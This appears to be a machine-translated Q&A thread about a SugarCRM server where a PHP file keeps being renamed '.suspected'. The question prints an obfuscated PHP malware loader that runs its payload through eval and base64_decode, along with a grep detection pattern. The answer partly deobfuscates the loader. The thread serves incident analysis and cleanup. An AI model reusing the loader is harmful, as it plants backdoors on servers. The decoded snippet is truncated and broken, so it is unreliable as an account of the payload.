php文件自动改名为php.suspected

自从最近4天以来,我们的生产服务器(AWS EC2实例)面临一个特殊的问题,即只有一个SugarCRM站点。

问题是/home/site_folder/public_html/include/MassUpdate.php文件被自动更名为/home/site_folder/public_html/include/MassUpdate.php.suspected

这种情况一天发生2-3次,间隔3-4小时。 只有特定站点的情况下才会出现此问题,即使它不在同一站点的临时副本中进行。 我甚至从两个站点检查该文件的代码,这是一样的。

我们已经谷歌search,发现这种问题主要发生在WordPress的网站,这可能是因为攻击。 但是,我们检查了我们的服务器对攻击,没有任何。 此外,服务器上没有运行病毒/恶意软件扫描。

我们应该做什么?

更新:通过这个链接后我们发现了一些东西我们执行了egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/发现下面的示例代码很less有文件。

  <?php function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];} $ixo="base64_decode";return $ixo($ggy);} $s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'. '0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X='; $koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f'); eval(flnftovr($s, $koicev));?> 

似乎一些恶意软件,我们如何去除它永久?

谢谢

Solutions Collecting From Web of "php文件自动改名为php.suspected"

这有点混乱,但我已经去混淆了它。函数flnftovr接受一个字符串和一个数组作为参数。 它使用公式创建一个新的字符串$ ggy

 isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];} 

然后将base64_decode预先加入到字符串中。

字符串是$ s,数组是$ koicev。 然后它会回应这个操纵的结果。 所以最终创建一个字符串:

 base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=) 

那么在你的服务器上实际运行的是:

 @ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('max_execution_time', 0); @set_time_limit(0); if(isset($_SERVER) encode(serialize($res)); } 

如果你没有创建这个,你怀疑你的网站已被黑客入侵,我建议你擦除服务器,并创建一个新的服务器上运行的任何应用程序的安装。